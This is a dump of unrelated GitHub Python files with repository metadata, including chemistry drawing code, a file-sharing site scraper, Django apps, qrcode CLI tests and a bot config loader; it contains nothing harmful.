d2d.drawOptions().addAtomIndices = True\n d2d.drawOptions().setHighlightColour((1.0, 0.5, 0.0))\n d2d.DrawMolecule(mol_ori, highlightAtoms=atom_hilights_ori, highlightBonds=bond_hilights)\n d2d.FinishDrawing()\n svg = d2d.GetDrawingText()\n with open('../tests/image/' + pic_name_ori + '.svg', 'w') as f:\n f.write(svg)\n\n # for mol_pred: highlight the bonds that are formed\n bond_hilights = []\n for i in range(len(diff)):\n for j in range(i + 1, len(diff)):\n if diff[i][j] >= 1:\n mol_pred.GetBondBetweenAtoms(i, j).SetProp(\"bondNote\", \"Formed\")\n bond_hilights.append(mol_pred.GetBondBetweenAtoms(i, j).GetIdx())\n\n atom_hilights_pred = [i for i in range(len(mol_ori.GetAtoms())) if\n any(diff[i][j] >= 1 for j in range(len(diff)))]\n\n mol_pred = Chem.DeleteSubstructs(mol_pred, reagents_smiles, onlyFrags=True)\n\n d2d = rdMolDraw2D.MolDraw2DSVG(350, 300)\n d2d.drawOptions().addAtomIndices = True\n d2d.drawOptions().setHighlightColour((1.0, 0.5, 0.0))\n d2d.DrawMolecule(mol_pred, highlightAtoms=atom_hilights_pred, highlightBonds=bond_hilights)\n d2d.FinishDrawing()\n # SVG(d2d.GetDrawingText())\n svg = d2d.GetDrawingText()\n with open('../tests/image/' + 'predicted products of' + pic_name_ori + '.svg', 'w') as f:\n f.write(svg)\n\n def draw_reaction(self, mol_ori, mol_pred, pic_name_ori):\n if len(pic_name_ori) > 20:\n pic_name_ori = pic_name_ori[:20]\n\n smile_ori = Chem.MolToSmiles(mol_ori)\n smile_pred = Chem.MolToSmiles(mol_pred)\n\n rxn = AllChem.ReactionFromSmarts(smile_ori + '>>' + smile_pred)\n d2d = Draw.MolDraw2DCairo(800, 400)\n d2d.DrawReaction(rxn, highlightByReactant=True)\n\n # svg = d2d.GetDrawingText()\n # with open('../tests/image/' + 'reaction_' + pic_name_ori + '.svg', 'w') as f:\n # f.write(svg)\n\n import io\n bio = io.BytesIO(d2d.GetDrawingText())\n open('../tests/image/' + 'reaction_' + pic_name_ori + '.png', 'wb+').write(bio.getvalue())\n\n def _run(self, input_string: str) -> str:\n # smile_atom_map, smile_no_atom_map, pred_smile_atom_mapping, pred_smile_no_atom_map, element, diff_adj\n cleaned_input = input_string.replace(\" \", \"\").lower()\n cleaned_input1 = input_string.replace(\" \", \"\")\n\n reactants_index = cleaned_input.find(\"reactants:\")\n reagents_index = cleaned_input.find(\"reagents:\")\n\n if reactants_index == -1 or reagents_index == -1:\n return None, None\n\n reactants = cleaned_input1[reactants_index + 10:reagents_index].strip()\n reagents = cleaned_input1[reagents_index + 9:].strip()\n\n smile_atom_map, smile_no_atom_map, pred_smile_atom_mapping, pred_smile_no_atom_mapping, src_element, diff_, \\\n mol_ori, mol_pred = self.pred_from_reactants_reagents(reactants, reagents)\n self.draw_reaction_graph(mol_ori, mol_pred, reagents, diff_, smile_no_atom_map)\n self.draw_reaction(mol_ori, mol_pred, smile_no_atom_map)\n explain = self.get_reaction_info(src_element, diff_)\n return '\\n'.join(['reactants SMILES:' + smile_no_atom_map,\n 'reactants after atom mapping:' + smile_atom_map,\n 'predicted products with atom mapping:' + pred_smile_atom_mapping,\n 'predicted products without atom mapping:' + pred_smile_no_atom_mapping,\n 'Changes in Covalent Bonds in Reactions'\n ] + explain)\n","repo_name":"Arlene036/ChemAgent_NERF","sub_path":"chemagent/tools/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":28657,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"36321767931","text":"# coding=utf-8\n\nfrom sandcrawler.scraper import ScraperBase\nfrom sandcrawler.scraper import SimpleScraperBase\n\n\nclass FileCatch(SimpleScraperBase):\n BASE_URL = 'http://filecatch.com'\n\n SINGLE_RESULTS_PAGE = True # in reality - no\n\n def setup(self):\n self.register_scraper_type(ScraperBase.SCRAPER_TYPE_OSP)\n self.search_term_language = 'eng'\n\n self.register_media(ScraperBase.MEDIA_TYPE_FILM)\n self.register_media(ScraperBase.MEDIA_TYPE_TV)\n self.register_media(ScraperBase.MEDIA_TYPE_BOOK)\n self.register_media(ScraperBase.MEDIA_TYPE_GAME)\n self.register_media(ScraperBase.MEDIA_TYPE_OTHER)\n\n for url in [self.BASE_URL, ]: # + self.OTHER_URLS:\n self.register_url(ScraperBase.URL_TYPE_SEARCH, url)\n self.register_url(ScraperBase.URL_TYPE_LISTING, url)\n\n self.proxy_region = 'nl' # at least not US!\n\n self._request_connect_timeout = 60\n self._request_response_timeout = 120\n\n def search(self, search_term, media_type, **extra):\n soup = self.get_soup(self._fetch_search_url(search_term, media_type))\n\n if not soup.select('#search_paging a'):\n self.submit_search_no_results()\n return\n\n max_page_num = int(soup.select('#search_paging a')[-1].href.split('&p=')[1])\n\n for page in range(1, max_page_num + 1):\n if not self.can_fetch_next():\n continue\n if page > 1:\n soup = self.get_soup(self._fetch_search_url(search_term, media_type, page=page))\n for link in soup.select('.btn.icon.adddwnl'):\n self.submit_search_result(link_title=link.attrs['title'][10:],\n link_url=self._fetch_search_url(search_term, media_type, page=page))\n\n # self.submit_parse_result(link_title=link.attrs['title'][10:],\n # link_url=link['href']\n # )\n self.log.debug('-----------------')\n\n def _fetch_no_results_text(self):\n return u' No files found.'\n\n def _fetch_search_url(self, search_term, media_type, page=1):\n return self.BASE_URL + '/?q=' + self.util.quote(search_term) + ('&p=%s' % page if page > 1 else '')\n\n def _parse_parse_page(self, soup):\n for link in soup.select('.btn.icon.adddwnl'):\n self.submit_parse_result(index_page_title=soup.title.text.strip(), link_title=link.attrs['title'][10:],\n link_url=link['href']\n )\n","repo_name":"realchief/Scraping_BeautifulSoup_phantomjs","sub_path":"scrapers/filecatch_com.py","file_name":"filecatch_com.py","file_ext":"py","file_size_in_byte":2599,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"94"} +{"seq_id":"31071810551","text":"from setuptools import setup\n\nimport pathlib\nHERE = pathlib.Path(__file__).parent\nREADME = (HERE / \"README.md\").read_text()\n\nsetup(name='gefera',\n version='0.1',\n description='two-body mutual transit light curves',\n long_description=README,\n long_description_content_type=\"text/markdown\",\n url='http://github.com/tagordon/gefera',\n author='Tyler Gordon',\n author_email='tagordon@uw.edu',\n license='MIT',\n packages=['gefera'],\n install_requires=['numpy'],\n zip_safe=False)\n\n","repo_name":"tagordon/exomoon_transits","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"7571093528","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('models', '0002_room_index'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='room',\n name='total_viewers',\n field=models.CharField(max_length=200),\n ),\n ]\n","repo_name":"johnlpuc163/zhibogame_django","sub_path":"models/migrations/0003_auto_20151010_1817.py","file_name":"0003_auto_20151010_1817.py","file_ext":"py","file_size_in_byte":399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"35018115789","text":"#Test the model with test images\n#here are some images located at: https://oreil.ly/dEUpx\n#you can try your own images. note: the model is training on images with whitebackground\nimport sys\nimport requests\n\nif(len(sys.argv) > 1):\n r = requests.get('http://localhost')\n print(r.text)\n\n inputfile = sys.argv[1]\n \"\"\" post image and return the response \"\"\"\n my_img = {'image': open(inputfile, 'rb')}\n r = requests.post('http://localhost/ml', files=my_img)\n print(r.text)\n\nelse:\n r = requests.get('http://localhost')\n print(r.text)\n","repo_name":"2GoodPhoU/RockPaperScissorsML","sub_path":"Sy_Assignment5/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"71518864951","text":"import io\nimport os\nimport sys\nimport unittest\nfrom tempfile import mkdtemp\nfrom unittest import mock\n\nfrom qrcode.compat.pil import Image\nfrom qrcode.console_scripts import commas, main\n\n\ndef bad_read():\n raise UnicodeDecodeError(\"utf-8\", b\"0x80\", 0, 1, \"invalid start byte\")\n\n\nclass ScriptTest(unittest.TestCase):\n def setUp(self):\n self.tmpdir = mkdtemp()\n\n def tearDown(self):\n os.rmdir(self.tmpdir)\n\n @mock.patch(\"os.isatty\", lambda *args: True)\n @mock.patch(\"qrcode.main.QRCode.print_ascii\")\n def test_isatty(self, mock_print_ascii):\n main([\"testtext\"])\n mock_print_ascii.assert_called_with(tty=True)\n\n @mock.patch(\"os.isatty\", lambda *args: False)\n @mock.patch(\"sys.stdout\")\n @unittest.skipIf(not Image, \"Requires PIL\")\n def test_piped(self, mock_stdout):\n main([\"testtext\"])\n\n @mock.patch(\"os.isatty\", lambda *args: True)\n @mock.patch(\"qrcode.main.QRCode.print_ascii\")\n @mock.patch(\"sys.stdin\")\n def test_stdin(self, mock_stdin, mock_print_ascii):\n mock_stdin.buffer.read.return_value = \"testtext\"\n main([])\n self.assertTrue(mock_stdin.buffer.read.called)\n mock_print_ascii.assert_called_with(tty=True)\n\n @mock.patch(\"os.isatty\", lambda *args: True)\n @mock.patch(\"qrcode.main.QRCode.print_ascii\")\n def test_stdin_py3_unicodedecodeerror(self, mock_print_ascii):\n mock_stdin = mock.Mock(sys.stdin)\n mock_stdin.buffer.read.return_value = \"testtext\"\n mock_stdin.read.side_effect = bad_read\n with mock.patch(\"sys.stdin\", mock_stdin):\n # sys.stdin.read() will raise an error...\n self.assertRaises(UnicodeDecodeError, sys.stdin.read)\n # ... but it won't be used now.\n main([])\n mock_print_ascii.assert_called_with(tty=True)\n\n @mock.patch(\"os.isatty\", lambda *args: True)\n @mock.patch(\"qrcode.main.QRCode.print_ascii\")\n def test_optimize(self, mock_print_ascii):\n main(\"testtext --optimize 0\".split())\n\n @mock.patch(\"sys.stdout\")\n def test_factory(self, mock_stdout):\n main(\"testtext --factory svg\".split())\n\n @mock.patch(\"sys.stderr\")\n def test_bad_factory(self, mock_stderr):\n self.assertRaises(SystemExit, main, \"testtext --factory fish\".split())\n\n @mock.patch.object(sys, \"argv\", \"qr testtext output\".split())\n @unittest.skipIf(not Image, \"Requires PIL\")\n def test_sys_argv(self):\n main()\n\n @unittest.skipIf(not Image, \"Requires PIL\")\n def test_output(self):\n tmpfile = os.path.join(self.tmpdir, \"test.png\")\n main([\"testtext\", \"--output\", tmpfile])\n os.remove(tmpfile)\n\n @mock.patch(\"sys.stderr\", new_callable=io.StringIO)\n @unittest.skipIf(not Image, \"Requires PIL\")\n def test_factory_drawer_none(self, mock_stderr):\n with self.assertRaises(SystemExit):\n main(\"testtext --factory pil --factory-drawer nope\".split())\n self.assertIn(\n \"The selected factory has no drawer aliases\", mock_stderr.getvalue()\n )\n\n @mock.patch(\"sys.stderr\", new_callable=io.StringIO)\n def test_factory_drawer_bad(self, mock_stderr):\n with self.assertRaises(SystemExit):\n main(\"testtext --factory svg --factory-drawer sobad\".split())\n self.assertIn(\"sobad factory drawer not found\", mock_stderr.getvalue())\n\n @mock.patch(\"sys.stderr\", new_callable=io.StringIO)\n def test_factory_drawer(self, mock_stderr):\n main(\"testtext --factory svg --factory-drawer circle\".split())\n\n def test_commas(self):\n self.assertEqual(commas([]), \"\")\n self.assertEqual(commas([\"A\"]), \"A\")\n self.assertEqual(commas(\"AB\"), \"A or B\")\n self.assertEqual(commas(\"ABC\"), \"A, B or C\")\n self.assertEqual(commas(\"ABC\", joiner=\"and\"), \"A, B and C\")\n","repo_name":"lincolnloop/python-qrcode","sub_path":"qrcode/tests/test_script.py","file_name":"test_script.py","file_ext":"py","file_size_in_byte":3807,"program_lang":"python","lang":"en","doc_type":"code","stars":3955,"dataset":"github-code","pt":"94"} +{"seq_id":"15536291205","text":"from django.core.management.base import BaseCommand\n\nfrom project_one.thirdapp.models import Article\n\n\nclass Command(BaseCommand):\n help = 'Update article by ID.'\n\n def add_arguments(self, parser):\n parser.add_argument('pk', type=int, help='Article ID')\n parser.add_argument('title', type=str, help='Article title')\n parser.add_argument('content', type=str, help='Article content')\n parser.add_argument('pub_date', type=str, help='Article publication date')\n parser.add_argument('author', type=int, help='Article author ID')\n parser.add_argument('category', type=str, help='Article category')\n parser.add_argument('released', type=bool, help='Article released')\n\n def handle(self, *args, **kwargs):\n pk = kwargs.get('pk')\n article = Article.objects.filter(pk=pk).first()\n if kwargs.get('title'):\n article.title = kwargs.get('title')\n if kwargs.get('content'):\n article.content = kwargs.get('content')\n if kwargs.get('pub_date'):\n article.pub_date = kwargs.get('pub_date')\n if kwargs.get('author'):\n article.author = kwargs.get('author')\n if kwargs.get('category'):\n article.category = kwargs.get('category')\n if kwargs.get('released'):\n article.released = kwargs.get('released')\n article.save()\n self.stdout.write(f'{article}')\n\n","repo_name":"AndreySozinov/Django_learning_project1","sub_path":"project_one/thirdapp/management/commands/update_article.py","file_name":"update_article.py","file_ext":"py","file_size_in_byte":1423,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"22888082646","text":"#!/usr/bin/env python\n\nimport os\nimport argparse\n\nimport dagmanager\n\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser(description='Prints vegetables of your choosing')\n parser.add_argument('--length', dest='length',\n default=10,\n help='Number of random numbers to be written to file')\n args = parser.parse_args()\n\n # Create CondorExecutable for example_script.py\n ex = dagmanager.CondorExecutable(name='save_numbers_script', path='{}/write_num_to_file.py'.format(os.getcwd()))\n # Create CondorJob that will pass arguments to example_script.py\n job = dagmanager.CondorJob(name='job', condorexecutable=ex)\n job.add_arg('--length {}'.format(args.length))\n # Create DagManager to build and submit jobs\n manager = dagmanager.DagManager(name='manager',\n condor_data_dir='{}/example_condor_dir'.format(os.getcwd()),\n condor_scratch_dir='{}/example_condor_dir'.format(os.getcwd()))\n manager.add_job(job)\n manager.build_submit()\n","repo_name":"jrbourbeau/dagmanager","sub_path":"examples/example_1/example_dagmanager_script.py","file_name":"example_dagmanager_script.py","file_ext":"py","file_size_in_byte":1019,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"71315555828","text":"from django.contrib import admin\n\n# Register your models here.\nfrom django.contrib import admin\nfrom django.contrib.auth.admin import UserAdmin\n\nfrom .forms import CustomUserCreationForm, CustomUserChangeForm\nfrom .models import CustomUser\n\n\nclass CustomUserAdmin(UserAdmin):\n add_form = CustomUserCreationForm\n form = CustomUserChangeForm\n model = CustomUser\n list_display = ['name', 'city', 'phone_number', 'email', 'photo']\n list_display_links = ['name', 'city', 'phone_number', 'email', 'photo']\n\n add_fieldsets = (\n *UserAdmin.add_fieldsets,\n (\n 'Пользовательская информация',\n {\n 'fields': (\n 'name',\n 'city',\n 'phone_number',\n 'status',\n 'photo',\n )\n }\n )\n )\n fieldsets = (\n *UserAdmin.fieldsets,\n (\n 'Пользовательская информация',\n {\n 'fields': (\n 'name',\n 'city',\n 'phone_number',\n 'status',\n 'photo',\n )\n }\n )\n )\n\n\nadmin.site.register(CustomUser, CustomUserAdmin)\n","repo_name":"Zarathustra5/fastbarter","sub_path":"fastbarter/users/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"34614201526","text":"import os\nimport glob\nimport numpy as np\nimport operator\nimport matplotlib.image as mpimg\nimport re\n\ndef grep(pat, txt, ind):\n r = re.search(pat, txt)\n return int(r.group(1))\n\nsave_images_dir = 'grid_images'\nif not os.path.exists(save_images_dir):\n os.makedirs(save_images_dir)\nimg_path = 'Desktop/sorted_clustered_images'\nfiles_lst = os.listdir(img_path)\nfiles_lst.sort(key=lambda txt: grep(r\"(\\d+)\\.(\\d+)_(\\d+)\\.png\", txt, 1))\nprint(files_lst)\n\ndef create_image_grid(images, grid_size=None):\n assert images.ndim == 3 or images.ndim == 4\n num, img_w, img_h, img_d = images.shape[0], images.shape[1], images.shape[2], images.shape[3]\n\n grid_w, grid_h = tuple(grid_size)\n\n grid = np.zeros([grid_h * img_h, grid_w * img_w] + [img_d], dtype=images.dtype)\n for idx in range(num):\n x = (idx % grid_w) * img_w\n y = (idx // grid_w) * img_h\n grid[y : y + img_h, x : x + img_w, :] = images[idx]\n return grid\nsave_\n","repo_name":"VITA-Group/BlackBoxGANCollapse","sub_path":"stylegan/monte_carlo/save_image_grid.py","file_name":"save_image_grid.py","file_ext":"py","file_size_in_byte":953,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"94"} +{"seq_id":"4845125615","text":"from create_models import Publisher, Shop, Book, Stock, Sale\nimport json\n\n\ndef insert_data(engine, Session):\n with Session() as session:\n with open('fixtures/tests_data.json', encoding='utf-8') as fd:\n data = json.load(fd)\n for record in data:\n model = {\n 'publisher': Publisher,\n 'shop': Shop,\n 'book': Book,\n 'stock': Stock,\n 'sale': Sale}[record.get('model')]\n session.add(model(id=record.get('pk'), **record.get('fields')))\n session.commit()\n print('Данные добавлены.')\n print()\n","repo_name":"alekgs/python_progs","sub_path":"netology/DataBase/SQLAlchemy/insert_db.py","file_name":"insert_db.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"10546169097","text":"# This file contains various settings for running and testing different interactomes, weighting parameters, and so on.\n\n#import toxcast_utils as t_utils\n\nVERSION = ''\n\nINTERACTOMES = {}\n\n# may specify the path to the evidence file used for this version, otherwise the default is used\nEVIDENCE_FILES = {}\n\n# zscore penalty versions. Adds a cost to the super-source -> rec and from the tf -> super-target based on the z-score of the assay\nZSCORE_PENALTY = []\n\n# bulk add these versions\nfor version in [\"2018_01-toxcast-d2d-p1_5-u1_25\"]:\n INTERACTOMES[version] = \"./inputs/2018_01-toxcast-net/2019-02-18-human-ppi-d2d-dir-weighted-cap0_99.txt\"\n ZSCORE_PENALTY.append(version)\n EVIDENCE_FILES[version] = \"./inputs/2018_01-toxcast-net/2018_01pathlinker-nokegg.tsv\"\n\nfor version in [\"2018_01-toxcast-p1_5\"]:\n INTERACTOMES[version] = \"./inputs/2018_01-toxcast-net/2019-02-18-human-ppi-weighted-cap0_99.txt\"\n ZSCORE_PENALTY.append(version)\n EVIDENCE_FILES[version] = \"./inputs/2018_01-toxcast-net/2018_01pathlinker-nokegg.tsv\"\n\nALLOWEDVERSIONS = sorted(INTERACTOMES.keys())\n\n# -log of this number is added to each edge before running cyclinker.\n# this effectively penalizes each path by the # of edges in the path * -log(edge_penalty)\nEDGE_PENALTIES = {\n \"2018_01-toxcast-p1_5\": 1.5,\n \"2018_01-toxcast-d2d-p1_5-u1_25\": 1.5,\n}\n\nUNDIR_PENALTIES = {\n \"2018_01-toxcast-d2d-p1_5-u1_25\": 1.25,\n}\n\n## DATADIR is the path to the data/ directory checked into SVN. \nDATADIR = '/data/jeff-law/data/svn-data'\nPATHLINKERDATADIR = '/data/jeff-law/projects/2015-03-pathlinker/data/pathway-specific-interactomes'\n# populate the interactomes paths\n#for version in INTERACTOMES:\n# if \"%s\" in INTERACTOMES[version]:\n# if version in [\"netpath-pathlinker-signaling-children-reg\", \"kegg-pathlinker-signaling-children-reg\"]:\n# INTERACTOMES[version] = INTERACTOMES[version] % PATHLINKERDATADIR\n# else:\n# INTERACTOMES[version] = INTERACTOMES[version] % DATADIR\n\n# these are specified by input options\nINPUTSPREFIX = ''\nRESULTSPREFIX = ''\nREC_TFS_FILE = \"%s/rec-tfs/%s-rec-tfs.txt\"\n# Instead of create a different interactome for each version, I will simply post-process the output of cyclinker\n#INTERACTOME_FILES = \"%s/interactome/%s-interactome.txt\"\n# follows the convention inputs/version/version-interactome.txt where version is the version name\nSPLIT_REC_TFS_INTERACTOME = '%s/%s-interactome.txt'\nCHEMICAL_MAP = ''\n#chemDSStoName, chemNametoDSS = t_utils.getChemicalNameMaps()\n# this is currently the 'scope' we are using to generate the random networks\n# 'permute-dir-undir' randomly swaps edges separately in the directed and undirected graphs\nDEFAULT_SCOPE = \"permute-dir-undir\"\n\n\ndef set_version(version):\n global VERSION, RESULTSPREFIX, INPUTSPREFIX, INTERACTOME\n global EDGE_PENALTY, REC_TFS_PENALTY, SPLIT_REC_TFS_INTERACTOME\n\n VERSION = version\n print(\"Using version %s\" % (VERSION))\n\n INPUTSPREFIX = \"inputs/versions/%s/\" % VERSION\n RESULTSPREFIX = \"outputs/%s/weighted/\" % VERSION\n INTERACTOME = INTERACTOMES[VERSION]\n # Also create a new \n if VERSION in UNDIR_PENALTIES:\n INTERACTOME = \"%s/%s-interactome-undir-penalty.txt\" % (INPUTSPREFIX, VERSION)\n\n # also setup some other variables for running cyclinker for each version\n if VERSION in ZSCORE_PENALTY:\n REC_TFS_PENALTY = True\n else:\n REC_TFS_PENALTY = False\n if VERSION in EDGE_PENALTIES:\n EDGE_PENALTY = EDGE_PENALTIES[VERSION]\n else:\n EDGE_PENALTY = None\n\n return INPUTSPREFIX, RESULTSPREFIX, INTERACTOME\n","repo_name":"Murali-group/tox_signaling_networks","sub_path":"src/toxcast_settings.py","file_name":"toxcast_settings.py","file_ext":"py","file_size_in_byte":3590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"74079311668","text":"import base64\nimport os\nfrom glob import glob\nfrom io import BytesIO\n\nfrom PIL import Image\nfrom django.shortcuts import render\n\n# Create your views here.\nfrom django.shortcuts import render\nfrom django.http import HttpResponse\nfrom django.template import loader\nfrom django.urls import reverse\n\nfrom .models import Category, Post,Store\nfrom my_tennis_club import settings\n\n\n\ndef deals(request):\n data={}\n return render(request, 'store/deals.html', context=data)\n\n\ndef stores(request):\n\n posts = Post.objects.all()\n stores = Store.objects.all()\n # noons=Post.objects.filter(store__slug__contains='no')\n # print(noons)\n images_path = os.path.join(settings.STATIC_ROOT, 'img/stores_images/')\n urlss = os.path.join(settings.STATIC_ROOT, 'img', 'urls_txt.css')\n urlss = [url.strip() for url in open(urlss, 'r').readlines()]\n # images = glob(images_path + '/*.*')\n # images_list = []\n # for image in images:\n # image = Image.open(image)\n # image64 = image_to_base64(image)\n # images_list.append(image64)\n\n flags = os.listdir(os.path.join(settings.STATIC_ROOT, \"img/stores_images\"))\n\n flags = ['img/stores_images/' + fl for fl in flags]\n data = {\n 'posts': posts,\n 'stores': stores,\n 'new_stores': stores,\n 'new_blogs': stores,\n 'page_title': DEFAULT_TITLE,\n 'images_list': urlss,\n 'images_path': urlss,\n 'flags': [],\n 'crumbs' : [\n (\"جميع المتاجر\", reverse('stores')),\n (\"جميع المتاجر\", reverse('stores')),\n (\"جميع المتاجر\", reverse('stores')),\n\n ],\n\n }\n return render(request, 'store/stores.html', context=data)\n\n\ndef image_to_base64(image):\n buff = BytesIO()\n image.save(buff, format=\"PNG\")\n img_str = base64.b64encode(buff.getvalue())\n img_str = img_str.decode(\"utf-8\") # convert to str and cut b'' chars\n return img_str\n\n\nimages_path = os.path.join(settings.STATIC_ROOT, 'img/stores_images')\n\nimages = glob(images_path + '\\*.*')\nimages_list = []\nfor image in images:\n if 'html' in image:\n continue\n image = Image.open(image)\n image64 = image_to_base64(image)\n images_list.append(image64)\n\n\nDEFAULT_TITLE='موقع كوبونات سيلز لجميع اكواد الخصم الحصرية'\ndef tgarba(request):\n # print('images_path', images_path)\n # print('rooot', settings.MEDIA_ROOT)\n\n template = loader.get_template('store/test.html')\n posts = Post.objects.all()\n stores = Store.objects.all()\n images_path = os.path.join(settings.STATIC_ROOT, 'img/stores_images/')\n urlss = os.path.join(settings.STATIC_ROOT, 'img','urls_txt.css')\n urlss=[url.strip() for url in open(urlss,'r').readlines()]\n print(urlss)\n # images = glob(images_path + '/*.*')\n # images_list = []\n # for image in images:\n # image = Image.open(image)\n # image64 = image_to_base64(image)\n # images_list.append(image64)\n\n flags = os.listdir(os.path.join(settings.STATIC_ROOT, \"img/stores_images\"))\n\n flags = ['img/stores_images/' + fl for fl in flags]\n data = {\n 'posts': posts,\n 'stores': stores,\n 'images_list': urlss,\n 'images_path': urlss,\n 'flags': [],\n\n }\n print(f'current dir {images}')\n return render(request, 'store/test.html', context=data)\n\n\ndef category_detail(slug):\n template = loader.get_template('store/stores.html')\n cat = Category.objects.get(slug=slug)\n print(cat)\n return HttpResponse(template.render())\n\n\ndef single_store(request,slug):\n posts = Post.objects.filter(store__slug=slug)\n\n\n stores = Store.objects.all()\n store = Store.objects.get(slug=slug)\n # Post.objects.filter(las)\n print(f'txt {store.text}')\n # noons=Post.objects.filter(store__slug__contains='no')\n # print(noons)\n for post in posts:\n print(post.last_modified,'ssss')\n images_path = os.path.join(settings.STATIC_ROOT, 'img/stores_images/')\n urlss = os.path.join(settings.STATIC_ROOT, 'img', 'urls_txt.css')\n urlss = [url.strip() for url in open(urlss, 'r').readlines()]\n # images = glob(images_path + '/*.*')\n # images_list = []\n # for image in images:\n # image = Image.open(image)\n # image64 = image_to_base64(image)\n # images_list.append(image64)\n\n flags = os.listdir(os.path.join(settings.STATIC_ROOT, \"img/stores_images\"))\n\n flags = ['img/stores_images/' + fl for fl in flags]\n data = {\n 'posts': posts,\n 'store': store,\n 'store_html': f'{store.html}.html' if store.html else '',\n 'posts_count': len(posts),\n 'stores': stores,\n 'new_stores': stores,\n 'page_title': DEFAULT_TITLE,\n 'new_blogs': stores,\n 'images_list': urlss,\n 'images_path': urlss,\n 'flags': [],\n\n }\n return render(request, 'store/store.html', context=data)\n","repo_name":"fahmy554/site_base","sub_path":"store/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4925,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"20986180152","text":"import json\nimport logging\nimport os\nimport sys\nimport time\nfrom collections import OrderedDict\n\nlogger = logging.getLogger(\"cloudbot\")\n\n\nclass Config(OrderedDict):\n \"\"\"\n :type filename: str\n :type path: str\n :type bot: cloudbot.bot.CloudBot\n \"\"\"\n\n def __init__(self, bot, *args, **kwargs):\n \"\"\"\n :type bot: cloudbot.bot.CloudBot\n :type args: list\n :type kwargs: dict\n \"\"\"\n super().__init__(*args, **kwargs)\n self.filename = \"config.json\"\n self.path = os.path.abspath(self.filename)\n self.bot = bot\n self.update(*args, **kwargs)\n\n self._api_keys = {}\n\n # populate self with config data\n self.load_config()\n\n def get_api_key(self, name, default=None):\n try:\n return self._api_keys[name]\n except LookupError:\n self._api_keys[name] = value = self.get('api_keys', {}).get(name, default)\n return value\n\n def load_config(self):\n \"\"\"(re)loads the bot config from the config file\"\"\"\n self._api_keys.clear()\n if not os.path.exists(self.path):\n # if there is no config, show an error and die\n logger.critical(\"No config file found, bot shutting down!\")\n print(\"No config file found! Bot shutting down in five seconds.\")\n print(\"Copy 'config.default.json' to 'config.json' for defaults.\")\n print(\"For help, see http://git.io/cloudbotirc. Thank you for using CloudBot!\")\n time.sleep(5)\n sys.exit()\n\n with open(self.path) as f:\n data = json.load(f, object_pairs_hook=OrderedDict)\n\n self.update(data)\n logger.debug(\"Config loaded from file.\")\n\n # reload permissions\n if self.bot.connections:\n for connection in self.bot.connections.values():\n connection.permissions.reload()\n\n def save_config(self):\n \"\"\"saves the contents of the config dict to the config file\"\"\"\n with open(self.path, 'w') as f:\n json.dump(self, f, indent=4)\n\n logger.info(\"Config saved to file.\")\n","repo_name":"irchelp-brasil/CloudBot","sub_path":"cloudbot/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2119,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"94"} +{"seq_id":"17111240527","text":"import serial\nfrom time import sleep\n\n\nser = serial.Serial(\n port='/dev/ttyS0',\n baudrate=9600,\n timeout=1\n)\n\n\nrequest = bytes([0xFF, 0x01, 0x86, 0x00, 0x00, 0x00, 0x00, 0x00, 0x79])\n\ntry:\n while True:\n ser.write(request)\n\n response = ser.read(9)\n res = list(response)\n print(res)\n print(res[2] * 256 + res[3])\n sleep(1)\nexcept Exception as e:\n print(e)\nfinally:\n ser.close()\n","repo_name":"ClimateNetTumoLabs/raspberry_soft","sub_path":"OldFolders/MH_Z16/uart.py","file_name":"uart.py","file_ext":"py","file_size_in_byte":436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"42890715593","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2019/2/15 9:20\n# @Author : Bilon\n# @File : 进程间通信示例.py\nimport multiprocessing\nimport time\n\n\n# 我们虚拟一个取词和词典进程间的通信\ndef ocr(que):\n for value in ['one', 'two', 'three']:\n print('完成取词...')\n que.put(value) # 将数据送出到进程共享队列\n time.sleep(1)\n\n\ndef dic(que):\n d = {'one': '一', 'two': '二', 'three': '三'}\n while True:\n value = que.get() # 从进程共享队列获取到数据\n print(value, ':', d[value], sep='')\n\n\nif __name__ == '__main__':\n que = multiprocessing.Queue() # 创建进程共享队列\n process1 = multiprocessing.Process(target=ocr, args=(que,))\n process2 = multiprocessing.Process(target=dic, args=(que,))\n process1.start()\n process2.start()\n\n process1.join() # 等待进程process1结束\n process2.terminate() # 终止进程\n","repo_name":"dopqob/Python","sub_path":"Python学习笔记/进程丨线程丨协程/进程间通信示例.py","file_name":"进程间通信示例.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"26325036548","text":"\nfrom fastapi import Depends,status,HTTPException,APIRouter,Header\nfrom typing import Union\nfrom 